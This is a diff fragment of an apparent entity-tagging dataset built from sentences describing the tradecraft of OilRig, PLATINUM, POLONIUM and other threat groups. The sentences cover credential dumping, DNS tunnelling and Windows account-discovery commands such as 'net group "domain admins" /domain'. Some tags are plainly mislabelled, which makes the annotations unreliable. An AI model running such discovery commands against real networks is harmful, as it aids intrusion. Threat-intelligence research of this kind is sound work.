+ "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "used", + "credential", + "dumping", + "tools", + "such", + "as", + "LaZagne", + "to", + "steal", + "credentials", + "to", + "accounts", + "logged", + "into", + "the", + "compromised", + "system", + "and", + "to", + "Outlook", + "Web", + "Access.", + "OilRig", + "has", + "also", + "used", + "tool", + "named", + "PICKPOCKET", + "to", + "dump", + "passwords", + "from", + "web", + "browsers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "used", + "DNS", + "for", + "C2", + "including", + "the", + "publicly", + "available", + "<code>requestbin.net</code>", + "tunneling", + "service." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "OilRig", + "macro", + "has", + "run", + "a", + "PowerShell", + "command", + "to", + "decode", + "file", + "contents.", + "OilRig", + "has", + "also", + "used", + "certutil", + "to", + "decode", + "base64-encoded", + "files", + "on", + "victims." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "run", + "<code>net", + "user</code>,", + "<code>net", + "user", + "/domain</code>,", + "<code>net", + "group", + "“domain", + "admins”", + "/domain</code>,", + "and", + "<code>net", + "group", + "“Exchange", + "Trusted", + "Subsystem”", + "/domain</code>", + "to", + "get", + "account", + "listings", + "on", + "a", + "victim." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "used", + "<code>net", + "group", + "/domain</code>,", + "<code>net", + "group", + "“domain", + "admins”", + "/domain</code>,", + "and", + "<code>net", + "group", + "“Exchange", + "Trusted", + "Subsystem”", + "/domain</code>", + "to", + "find", + "domain", + "group", + "permission", + "settings." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "encrypted", + "and", + "encoded", + "data", + "in", + "its", + "malware,", + "including", + "by", + "using", + "base64." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "exfiltrated", + "data", + "over", + "FTP", + "separately", + "from", + "its", + "primary", + "C2", + "channel", + "over", + "DNS." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "uses", + "remote", + "services", + "such", + "as", + "VPN,", + "Citrix,", + "or", + "OWA", + "to", + "persist", + "in", + "an", + "environment." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Tool", + "B-Way", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "malware", + "ISMAgent", + "falls", + "back", + "to", + "its", + "DNS", + "tunneling", + "mechanism", + "if", + "it", + "is", + "unable", + "to", + "reach", + "the", + "C2", + "server", + "over", + "HTTP." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "deleted", + "files", + "associated", + "with", + "their", + "payload", + "after", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "tested", + "malware", + "samples", + "to", + "determine", + "AV", + "detection", + "and", + "subsequently", + "modified", + "the", + "samples", + "to", + "ensure", + "AV", + "evasion." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "can", + "download", + "remote", + "files", + "onto", + "victims." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "used", + "keylogging", + "tools", + "called", + "KEYPUNCH", + "and", + "LONGWATCH." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "used", + "credential", + "dumping", + "tools", + "such", + "as", + "LaZagne", + "to", + "steal", + "credentials", + "to", + "accounts", + "logged", + "into", + "the", + "compromised", + "system", + "and", + "to", + "Outlook", + "Web", + "Access." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "used", + "credential", + "dumping", + "tools", + "such", + "as", + "Mimikatz", + "to", + "steal", + "credentials", + "to", + "accounts", + "logged", + "into", + "the", + "compromised", + "system", + "and", + "to", + "Outlook", + "Web", + "Access." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "run", + "<code>net", + "user</code>,", + "<code>net", + "user", + "/domain</code>,", + "<code>net", + "group", + "“domain", + "admins”", + "/domain</code>,", + "and", + "<code>net", + "group", + "“Exchange", + "Trusted", + "Subsystem”", + "/domain</code>", + "to", + "get", + "account", + "listings", + "on", + "a", + "victim." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "used", + "<code>net", + "localgroup", + "administrators</code>", + "to", + "find", + "local", + "administrators", + "on", + "compromised", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "delivered", + "macro-enabled", + "documents", + "that", + "required", + "targets", + "to", + "click", + "the", + "\"enable", + "content\"", + "button", + "to", + "execute", + "the", + "payload", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "delivered", + "malicious", + "links", + "to", + "achieve", + "execution", + "on", + "the", + "target", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "used", + ".doc", + "file", + "extensions", + "to", + "mask", + "malicious", + "executables." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "used", + "the", + "publicly", + "available", + "tool", + "SoftPerfect", + "Network", + "Scanner", + "as", + "well", + "as", + "a", + "custom", + "tool", + "called", + "GOLDIRONY", + "to", + "conduct", + "network", + "scanning." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "abused", + "the", + "Outlook", + "Home", + "Page", + "feature", + "for", + "persistence.", + "OilRig", + "has", + "also", + "used", + "CVE-2017-11774", + "to", + "roll", + "back", + "the", + "initial", + "patch", + "designed", + "to", + "protect", + "against", + "Home", + "Page", + "abuse." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "used", + "net.exe", + "in", + "a", + "script", + "with", + "<code>net", + "accounts", + "/domain</code>", + "to", + "find", + "the", + "password", + "policy", + "of", + "a", + "domain." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "used", + "tools", + "to", + "identify", + "if", + "a", + "mouse", + "is", + "connected", + "to", + "a", + "targeted", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "used", + "PowerShell", + "scripts", + "for", + "execution,", + "including", + "use", + "of", + "a", + "macro", + "to", + "run", + "a", + "PowerShell", + "command", + "to", + "decode", + "file", + "contents." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "run", + "<code>tasklist</code>", + "on", + "a", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "used", + "the", + "Plink", + "utility", + "and", + "other", + "tools", + "to", + "create", + "tunnels", + "to", + "C2", + "servers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Tool", + "I-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "used", + "<code>reg", + "query", + "“HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal", + "Server", + "Client\\Default”</code>", + "on", + "a", + "victim", + "to", + "query", + "the", + "Registry." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "used", + "Remote", + "Desktop", + "Protocol", + "for", + "lateral", + "movement.", + "The", + "group", + "has", + "also", + "used", + "tunneling", + "tools", + "to", + "tunnel", + "RDP", + "into", + "the", + "environment." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "used", + "Putty", + "to", + "access", + "compromised", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "created", + "scheduled", + "tasks", + "that", + "run", + "a", + "VBScript", + "to", + "execute", + "a", + "payload", + "on", + "victim", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "a", + "tool", + "called", + "CANDYKING", + "to", + "capture", + "a", + "screenshot", + "of", + "user's", + "desktop." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "sent", + "spearphising", + "emails", + "with", + "malicious", + "attachments", + "to", + "potential", + "victims", + "using", + "compromised", + "and/or", + "spoofed", + "email", + "accounts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "sent", + "spearphising", + "emails", + "with", + "malicious", + "links", + "to", + "potential", + "victims." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "used", + "LinkedIn", + "to", + "send", + "spearphishing", + "links." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "used", + "macros", + "to", + "verify", + "if", + "a", + "mouse", + "is", + "connected", + "to", + "a", + "compromised", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "run", + "<code>hostname</code>", + "and", + "<code>systeminfo</code>", + "on", + "a", + "victim." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "run", + "<code>ipconfig", + "/all</code>", + "on", + "a", + "victim." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "used", + "<code>netstat", + "-an</code>", + "on", + "a", + "victim", + "to", + "get", + "a", + "listing", + "of", + "network", + "connections." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "run", + "<code>whoami</code>", + "on", + "a", + "victim." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "used", + "<code>sc", + "query</code>", + "on", + "a", + "victim", + "to", + "gather", + "information", + "about", + "services." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "used", + "compromised", + "credentials", + "to", + "access", + "other", + "systems", + "on", + "a", + "victim", + "network." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "used", + "VBScript", + "macros", + "for", + "execution", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "used", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "used", + "web", + "shells,", + "often", + "to", + "maintain", + "access", + "to", + "a", + "victim", + "network." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "used", + "macros", + "to", + "deliver", + "malware", + "such", + "as", + "QUADAGENT", + "and", + "OopsIE.", + "OilRig", + "has", + "used", + "batch", + "scripts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Idus", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "used", + "credential", + "dumping", + "tool", + "named", + "VALUEVAULT", + "to", + "steal", + "credentials", + "from", + "the", + "Windows", + "Credential", + "Manager." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OilRig", + "has", + "used", + "WMI", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Orangeworm", + "has", + "copied", + "its", + "backdoor", + "across", + "open", + "network", + "shares,", + "including", + "ADMIN$,", + "C$WINDOWS,", + "D$WINDOWS,", + "and", + "E$WINDOWS." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Orangeworm", + "has", + "used", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "PLATINUM", + "is", + "capable", + "of", + "using", + "Windows", + "hook", + "interfaces", + "for", + "information", + "gathering", + "such", + "as", + "credential", + "access." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "B-Way", + "B-Features" + ] + }, + { + "tokens": [ + "PLATINUM", + "has", + "sometimes", + "used", + "drive-by", + "attacks", + "against", + "vulnerable", + "browser", + "plugins." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Org", + "B-OffAct", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "PLATINUM", + "has", + "leveraged", + "a", + "zero-day", + "vulnerability", + "to", + "escalate", + "privileges." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Features", + "B-Exp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PLATINUM", + "has", + "transferred", + "files", + "using", + "the", + "Intel®", + "Active", + "Management", + "Technology", + "(AMT)", + "Serial-over-LAN", + "(SOL)", + "channel." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PLATINUM", + "has", + "used", + "several", + "different", + "keyloggers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "PLATINUM", + "has", + "used", + "keyloggers", + "that", + "are", + "also", + "capable", + "of", + "dumping", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "PLATINUM", + "has", + "attempted", + "to", + "get", + "users", + "to", + "open", + "malicious", + "files", + "by", + "sending", + "spearphishing", + "emails", + "with", + "attachments", + "to", + "victims." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PLATINUM", + "has", + "renamed", + "rar.exe", + "to", + "avoid", + "detection." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PLATINUM", + "has", + "used", + "the", + "Intel®", + "Active", + "Management", + "Technology", + "(AMT)", + "Serial-over-LAN", + "(SOL)", + "channel", + "for", + "command", + "and", + "control." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Time", + "I-Tool", + "I-Tool", + "I-Tool", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PLATINUM", + "has", + "used", + "various", + "methods", + "of", + "process", + "injection", + "including", + "hot", + "patching." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Way", + "B-Way" + ] + }, + { + "tokens": [ + "PLATINUM", + "has", + "sent", + "spearphishing", + "emails", + "with", + "attachments", + "to", + "victims", + "as", + "its", + "primary", + "initial", + "access", + "vector." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POLONIUM", + "has", + "used", + "OneDrive", + "and", + "DropBox", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "POLONIUM", + "has", + "exfiltrated", + "stolen", + "data", + "to", + "POLONIUM-owned", + "OneDrive", + "and", + "Dropbox", + "accounts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POLONIUM", + "has", + "used", + "the", + "AirVPN", + "service", + "for", + "operational", + "activity." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "I-OffAct", + "O" + ] + }, + { + "tokens": [ + "POLONIUM", + "has", + "obtained", + "and", + "used", + "tools", + "such", + "as", + "AirVPN", + "and", + "plink", + "in", + "their", + "operations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POLONIUM", + "has", + "used", + "compromised", + "credentials", + "from", + "an", + "IT", + "company", + "to", + "target", + "downstream", + "customers", + "including", + "a", + "law", + "firm", + "and", + "aviation", + "company." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "O", + "I-Org", + "I-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Org", + "I-Org", + "O", + "I-Org", + "O" + ] + }, + { + "tokens": [ + "POLONIUM", + "has", + "used", + "valid", + "compromised", + "credentials", + "to", + "gain", + "access", + "to", + "victim", + "environments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POLONIUM", + "has", + "created", + "and", + "used", + "legitimate", + "Microsoft", + "OneDrive", + "accounts", + "for", + "their", + "operations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PROMETHIUM", + "has", + "signed", + "code", + "with", + "self-signed", + "certificates." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PROMETHIUM", + "has", + "created", + "self-signed", + "certificates", + "to", + "sign", + "malicious", + "installers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Tool", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PROMETHIUM", + "has", + "created", + "self-signed", + "digital", + "certificates", + "for", + "use", + "in", + "HTTPS", + "C2", + "traffic." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "PROMETHIUM", + "has", + "used", + "watering", + "hole", + "attacks", + "to", + "deliver", + "malicious", + "versions", + "of", + "legitimate", + "installers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Org", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PROMETHIUM", + "has", + "created", + "admin", + "accounts", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PROMETHIUM", + "has", + "attempted", + "to", + "get", + "users", + "to", + "execute", + "compromised", + "installation", + "files", + "for", + "legitimate", + "software", + "including", + "compression", + "applications,", + "security", + "software,", + "browsers,", + "file", + "recovery", + "applications,", + "and", + "other", + "tools", + "and", + "utilities." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O", + "I-Tool", + "O", + "B-Way", + "B-Purp", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PROMETHIUM", + "has", + "named", + "services", + "to", + "appear", + "legitimate." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PROMETHIUM", + "has", + "disguised", + "malicious", + "installer", + "files", + "by", + "bundling", + "them", + "with", + "legitimate", + "software", + "installers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "PROMETHIUM", + "has", + "used", + "a", + "script", + "that", + "configures", + "the", + "knockd", + "service", + "and", + "firewall", + "to", + "only", + "accept", + "C2", + "connections", + "from", + "systems", + "that", + "use", + "a", + "specified", + "sequence", + "of", + "knock", + "ports." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PROMETHIUM", + "has", + "used", + "Registry", + "run", + "keys", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PROMETHIUM", + "has", + "created", + "new", + "services", + "and", + "modified", + "existing", + "services", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Patchwork", + "encrypted", + "the", + "collected", + "files'", + "path", + "with", + "AES", + "and", + "then", + "encoded", + "them", + "with", + "base64." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Patchwork", + "developed", + "a", + "file", + "stealer", + "to", + "search", + "C:\\", + "and", + "collect", + "files", + "with", + "certain", + "extensions.", + "Patchwork", + "also", + "executed", + "a", + "script", + "to", + "enumerate", + "all", + "drives,", + "store", + "them", + "as", + "a", + "list,", + "and", + "upload", + "generated", + "files", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Patchwork", + "has", + "used", + "BITS", + "jobs", + "to", + "download", + "malicious", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-Purp", + "O" + ] + }, + { + "tokens": [ + "Patchwork", + "apparently", + "altered", + "NDiskMonitor", + "samples", + "by", + "adding", + "four", + "bytes", + "of", + "random", + "letters", + "in", + "a", + "likely", + "attempt", + "to", + "change", + "the", + "file", + "hashes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Patchwork", + "bypassed", + "User", + "Access", + "Control", + "(UAC)." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Patchwork", + "has", + "signed", + "malware", + "with", + "self-signed", + "certificates", + "from", + "fictitious", + "and", + "spoofed", + "legitimate", + "software", + "companies." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Org", + "I-Org", + "O" + ] + }, + { + "tokens": [ + "Patchwork", + "has", + "created", + "self-signed", + "certificates", + "from", + "fictitious", 